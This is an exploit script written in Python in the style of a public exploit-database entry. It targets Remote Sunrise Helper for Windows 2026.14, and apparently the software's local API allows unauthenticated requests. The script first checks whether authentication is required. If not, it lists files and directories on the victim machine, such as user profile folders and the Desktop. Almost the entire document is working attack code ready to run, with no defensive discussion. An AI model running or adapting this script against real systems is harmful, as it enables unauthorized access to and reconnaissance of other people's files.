#!/usr/bin/env python3
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated File/Directory Listing
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11
import requests, json, sys, urllib3
from urllib.parse import quote
urllib3.disable_warnings()
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_ip> [path]")
print(f"Example: {sys.argv[0]} 192.168.1.103")
print(f"Example: {sys.argv[0]} 192.168.1.103 'C:/Users'")
print(f"Example: {sys.argv[0]} 192.168.1.103 '%USERPROFILE%/Desktop'")
sys.exit(1)
target = sys.argv[1]
path = sys.argv[2] if len(sys.argv) > 2 else ""
url = f"https://{target}:49762"
headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}
r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
data = r.json()
if data.get("requires.auth") == False:
if path:
encoded = quote(path, safe='')
r = requests.get(f"{url}/api/listFiles={encoded}", headers=headers,
verify=False)
else:
r = requests.get(f"{url}/api/listFiles", headers=headers,
verify=False)
print(json.dumps(r.json(), indent=2))
else:
print("[*] Not vulnerable - authentication required")
